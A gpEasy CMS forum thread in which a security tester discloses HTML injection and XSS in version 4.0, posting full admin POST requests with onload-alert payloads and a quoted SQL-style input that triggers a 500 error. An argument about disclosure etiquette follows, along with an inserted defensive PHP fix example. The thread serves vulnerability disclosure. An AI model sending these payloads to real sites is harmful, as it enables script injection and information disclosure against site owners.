Topic Closed

Hi gpEasy Team, and all members of this forum.

In my day to day work, I'm doing a lot of pentests and code review, mostly related to webapps because this is the 'first stage', in a way, 'customer <-> company'. After work, I'm going home, and ... I'm doing a lot of pentests and code review, but this time only 'for me' (as you can check at my blog, where a few ideas are described).

Yesterday I found that gpEasy is available for download in a new version (4.0) and I decided to check it.

I must say that I was very surprised that you have blocked most of the payloads for XSS and SQLi attacks. But... ;]

I found it anyway, and that's how I found this forum (this time I decided to post the information 'first to you', not at my blog, like it was for the version before: http://hauntit.blogspot.com/2013/04/gpeasy-36-html-injection.html ).

So. I found a few vulnerabilities in the latest release. All were tested as a logged-in admin, so I suppose there could be a potential risk of a CSRF attack (I didn't check it yet, so please think about it).

1. HTML injection is possible:


POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.101/kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra
Content-Length: 198
Cookie: lang=en; lang=en; gpEasy_a1a985378d83=aNKzZKyH2iITzVb8Md5DMSg8isb2Cc5dlkkQ9Tgh
Connection: close
Pragma: no-cache
Cache-Control: no-cache

cmd=new_section&file=aaaaaaaaaaaa&type=<h1>aaaaaaaaaaaaaaaaaaaaaaaa<br>bbbbbbbbbbbbbbbbbbb</h1>&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area


response:

(...)

md=delete&amp;file=%60__%21%40%24%25%5E&amp;%28%29_%20%7D%7B=%5B%5D%3B%23alert%284321%29\" data-cmd=\"postlink\" title=\"Are you sure you want to permanently remove `[email protected]$%^&amp;()_+}{=[];#alert(4321)? \" class=\"gpconfirm\" data-nonce=\"95027f35b0\">Delete</a></td></tr><tr class=\"even\"><td style=\"white-space:nowrap\">aaaaaaaaaaaa</td><td><h1>aaaaaaaaaaaaaaaaaaaaaaaa<br>bbbbbbbbbbbbbbbbbbb</h1></td><td>\"<span class=\"admin_note\">New Section</span>...\"</td><td style=\"white-space:nowrap\"><a href=\"/kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?cmd=view&amp;file=aaaaaaaaaaaa\" title=\"Preview\">Preview</a> &nbsp; <a href=\"/kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?cmd=delete&amp;file=aaaaaaaaaaaa\" data-cmd=\"postlink\" title=\"Are you sure you want to permanently remove aaaaaa
(...)


2. XSS is possible:

POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.101/kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra
Content-Length: 190
Cookie: lang=en; lang=en; gpEasy_a1a985378d83=aNKzZKyH2iITzVb8Md5DMSg8isb2Cc5dlkkQ9Tgh
Connection: close
Pragma: no-cache
Cache-Control: no-cache

cmd=new_section&file=aaaaaaaaaaaa&type=<h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbbbbbb</h1>&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area

(the same place, but different payload)

response:
(...)
>Delete</a></td></tr><tr class=\"even\"><td style=\"white-space:nowrap\">aaaaaaaaaaaa</td><td><h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbbbbbb</h1></td><td>\"<span class=\"admin_note\">New Section</span>...\"</td><td style=\"white-space:nowrap\"><a href=\"/kuba/gpEasy4.0/gpE

(...)


3. XSS again:

POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.101/kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra
Content-Length: 164
Cookie: lang=en; lang=en; gpEasy_a1a985378d83=aNKzZKyH2iITzVb8Md5DMSg8isb2Cc5dlkkQ9Tgh
Connection: close
Pragma: no-cache
Cache-Control: no-cache

cmd=new_section&file=aaaaaaaaaaaa&type='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area


(the response will be similar).

 

4. (and 5) - I think it could be a "bug" only; anyway, below is detailed information:

500 error:

POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&jsoncallback=jQuery183008074821283823352_1369418498905 HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.101/kuba/gpEasy4.0/gpEasy/index.php/Admin_Menu?menu=%27%22%60%3e%3c%[email protected]$%^%26%2a()_%2b}{%3d[]%27%3b
Content-Length: 961
Cookie: lang=en; lang=en; gpEasy_a1a985378d83=aNKzZKyH2iITzVb8Md5DMSg8isb2Cc5dlkkQ9Tgh
Connection: close
Pragma: no-cache
Cache-Control: no-cache

title=My+gpEasy+CMS&keywords=gpEasy+CMS%2C+Easy+CMS%2C+Content+Management%2C+PHP%2C+Free+CMS%2C+Website+builder%2C+Open+Source&desc=A+new+gpEasy+CMS+installation.+You+can+change+your+site's+description+in+the+configuration.&colorbox_style=example1&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true&showgplink=false&showgplink=true&jquery=local&maximgarea=691200&maxthumbsize=100&auto_redir=90&HTML_Tidy='%2bOR%2b1%3d1--&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=true&resize_images=false&resize_images=true&toemail=admin%40here.com&toname=&from_address=AutomatedSender%40192.168.1.101&from_name=Automated+Sender&from_use_user=false&require_email=&mail_method=mail&sendmail_path=&smtp_hosts=&smtp_user=&smtp_pass=&recaptcha_public=&recaptcha_private=&recaptcha_language=inherit&cmd=save_config&verified=95027f35b0&verified=95027f35b0&aaa=Save

 

response:

HTTP/1.0 500 Internal Server Error
Date: Fri, 24 May 2013 18:07:02 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Last-Modified: Fri, 24 May 2013 18:07:02 GMT
Expires: Fri, 24 May 2013 18:07:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 764
Connection: close
Content-Type: text/html; charset=utf-8

<p>Oops, an error occurred while generating this page.<p><h3>Error Details</h3><pre>array(
   [type] =&gt; (integer)4
   [message] =&gt; (string)syntax error, unexpected ''in' (T_ENCAPSED_AND_WHITESPACE)
   [file] =&gt; (string)/home/kuba/public_html/gpEasy4.0/gpEasy/data/_site/config.php
   [line] =&gt; (integer)92
   [request] =&gt; (string)/kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&amp;jsoncallback=jQuery183008074821283823352_1369418498905
   [time] =&gt; (integer)1369418822
   [request_method] =&gt; (string)POST
   [file_modified] =&gt; (integer)1369418822
   [file_size] =&gt; (integer)3082
)</pre><p><a href="">Reload this page</a></p><p style="font-size:90%">Note: Error details are only displayed for logged in administrators</p>


So as you can see, there is an information disclosure bug.

Another case looks like this:


POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&jsoncallback=jQuery183008074821283823352_1369418498905 HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.101/kuba/gpEasy4.0/gpEasy/index.php/Admin_Menu?menu=%27%22%60%3e%3c%[email protected]$%^%26%2a()_%2b}{%3d[]%27%3b
Content-Length: 1052
Cookie: lang=en; lang=en; gpEasy_a1a985378d83=aNKzZKyH2iITzVb8Md5DMSg8isb2Cc5dlkkQ9Tgh
Connection: close
Pragma: no-cache
Cache-Control: no-cache

title=My+gpEasy+CMS&keywords=gpEasy+CMS%2C+Easy+CMS%2C+Content+Management%2C+PHP%2C+Free+CMS%2C+Website+builder%2C+Open+Source&desc=A+new+gpEasy+CMS+installation.+You+can+change+your+site's+description+in+the+configuration.&colorbox_style=example1&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true&showgplink=false&showgplink=true&jquery=local&maximgarea=691200&maxthumbsize=100&auto_redir=90&HTML_Tidy=&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=t

Edited: 4 years ago#6023

Ups... my message was too long, and was cut in some way :)

Ok, so:

I think you've done a great job here (in the 4.0 release). Keep going! :)

In case of filtering - IMHO you can check how phpMyAdmin does that; they do an excellent job.

Also, maybe think about whitelists (not blacklists, because adding '+' to tags like script will not make your code secure.

Attacks depend on the imagination of the attacker, so he will always find a way to input a payload, even if you add 4++++ there ;P )

If you have any questions, or just want to talk, you can find my email here, or at my blog, so feel free to write to me.

I will answer as soon as possible.

 

Best regards,

Jakub

4 years ago#6024
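Two defensive fixes for the issues in this report, as an added example that is not gpEasy's own code: the admin-supplied 'type' value is HTML-escaped at the point it is echoed into the Admin_Extra table, and config values are written to config.php with var_export() instead of being interpolated into single-quoted literals (an apostrophe reaching such a literal is the class of failure behind the 500 error above). Function names and the row layout are hypothetical.

```php
<?php
// Added example, not gpEasy code. Function names are hypothetical.

// Output encoding: escape admin-supplied values where they are inserted
// into HTML. With ENT_QUOTES both ' and " are escaped, so the value can
// neither close an attribute nor open a new tag such as <body onload=...>.
function render_section_row(string $file, string $type): string
{
    $esc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<tr><td>' . $esc($file) . '</td><td>' . $esc($type) . '</td></tr>';
}

// Naive config writer: interpolates raw values into single-quoted PHP
// literals. A value containing an apostrophe leaves config.php
// unparseable, which is the kind of failure behind the
// "syntax error, unexpected ''in'" shown in the report.
function write_config_naive(array $config): string
{
    $out = "<?php\n\$config = array(\n";
    foreach ($config as $key => $value) {
        $out .= "  '$key' => '$value',\n";
    }
    return $out . ");\n";
}

// Hardened writer: var_export() emits a valid PHP literal for any string
// (quotes and backslashes are escaped), so the saved file always parses.
function write_config_safe(array $config): string
{
    return "<?php\n\$config = " . var_export($config, true) . ";\n";
}

// Constructed input mirroring the values seen in the report.
$config = ['title' => 'My gpEasy CMS', 'HTML_Tidy' => "'+OR+1=1--"];

echo render_section_row('aaaaaaaaaaaa', '<h1>a<body onload=alert(/x/)>b</h1>'), "\n";
echo write_config_naive($config), "\n";  // contains an unbalanced quote
echo write_config_safe($config), "\n";   // parses cleanly
```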

jogai
264 Posts

So you're saying that a logged in admin can post html? Well, it's the freaking job of a cms to let that happen. Sure an admin can make xss attacks this way. Everyone that runs a site can.

Also you're referring to phpMyAdmin. That shit is vulnerable as hell.

If you're really concerned, you should've mailed the author directly. This forum is open to everyone thus not so different than posting on your 'security blog'. On this forum are users of gpEasy who might get anxious about this without reason.

4 years ago#6028

Josh S.
2K Posts
235K Downloads
16 Themes
18 Plugins

Hi Jakub,

Thanks for running pentests for gpEasy in your spare time. There's no such thing as too much testing, especially security related testing. I haven't had a chance to read through everything you posted yet, but I will as soon as I have time.

-Josh

4 years ago#6030

Great Josh :)

 

If you have any questions, let me know. Maybe I can help you with patching for the new release. ;)

 

Regards,

Jakub

4 years ago#6032

jogai: yes, I'm saying that an admin can send 'html' if he is logged in. Try to put <script>alert(/jogai/)</script> if this is so fucking simple in the 4.0 version. ;)

Second thing, show me some CSRF protection in the 4.0 version.

3rd thing: read a few words here http://en.wikipedia.org/wiki/Responsible_disclosure. And to your 'send directly to admin': I didn't find 'his email' in the readme, nor on this page, so I decided to post it here to 'get to know' the whole community (I suppose here I will find some developers of this CMS).

In the case of phpMyAdmin, I don't think they have shitty code. I've been checking their code since version 2.x and from version to version they get much better; that's why this was an example to check 'how they do it' and think about similar filters in gpEasy.

4th: thanks for watching my 'security blog'. ;)

take care o/

4 years ago#6034

Josh S.
2K Posts
235K Downloads
16 Themes
18 Plugins

Maybe I can help you with patching for new release. ;)

Definitely not going to say "no" to that

4 years ago#6047

Josh S.
2K Posts
235K Downloads
16 Themes
18 Plugins

show me some csrf-protection

For some time, gpEasy has used nonces to verify POST requests (see the 'verified' value in your examples). Do you feel like our nonce implementation isn't secure enough?

4 years ago#6060

jogai
264 Posts

Responsible disclosure: I think it's easy enough to find Josh's contact information to disclose this first to him. He's a nice person and certainly would've given you full credit for finding these bugs. The release cycles are usually short so you wouldn't have to wait long before publishing this anywhere after it was patched. The community is not that big and the uninformed may now think gpEasy is not safe to use.

The amount of 0day posts on your blog is too damn high! That's not responsible disclosure, that's just disclosure.

I still think phpMyAdmin is crap considering security. I don't think they have shitty code, but security is easy to do wrong.

 

4 years ago#6061

jogai: thanks for reading all the content at my blog, really impressive. ;]

If you asked, I've been doing pentests and code review for 15 years.
Not all '0day' can be published because a few of them are sold in bug bounties, etc.

I will be very, very glad to read your blog. I'm always looking for a good place to learn. Anyway: all right! your dick is bigger, you're the mastah of h4ckth3pl4n3t.

ad. pma - you can think they have 'crap', whatever dude. I'm working with them sometimes, reporting bugs/vulns to them, and they have one of the fastest responses I've ever seen. They're always kind and want to cooperate. Any vuln/bug detailed to them is considered and, as a friendly cooperation, a patch is created.

Anyway, you discouraged me so much from this forum and CMS that I will stay with pma.

Thanks Josh S. It was a pleasure ;)

cheers o/

4 years ago#6065

jogai
264 Posts

I didn't read it all, I just made a quick count. And I don't have a blog myself, and even if I did it wouldn't be about pentesting or anything security related. I didn't even say I was a master of anything. I just had a problem with the early and open disclosure.

And since you brought it up; Yours is apparently bigger because I stepped on it.. :-)

Josh is also very kind (although he'll be probably mad at me now) and wants to cooperate. You shouldn't let a random forum user (me) scare you so easily away.

For the record, I'm not affiliated in any way with gpEasy. I'm not even registered as a service provider.

 

4 years ago#6068

Josh S.
2K Posts
235K Downloads
16 Themes
18 Plugins

Just following up here on the status of these bug reports.

Jakub claimed that gpEasy was vulnerable to multiple CSRF attacks and claimed gpEasy lacked any CSRF protection. The fact is, gpEasy does protect against CSRF. gpEasy verifies every single POST request with a constantly changing and installation specific nonce. My guess is that Jakub was able to hack his installation, because he copied the correct nonce for his site into his attack code.

Unfortunately, we weren't able to discuss this any further. Jogai, I really appreciate your enthusiasm for gpEasy, but let's keep it civil in the forums.

4 years ago#6158

jogai
264 Posts

Sorry about that; sometimes I have the urge to answer BS in a sh*tty way.. I'll try to keep this corner of the internet more civil in the future.

Happy to hear that gpEasy isn't open to these vulnerabilities!

4 years ago#6168
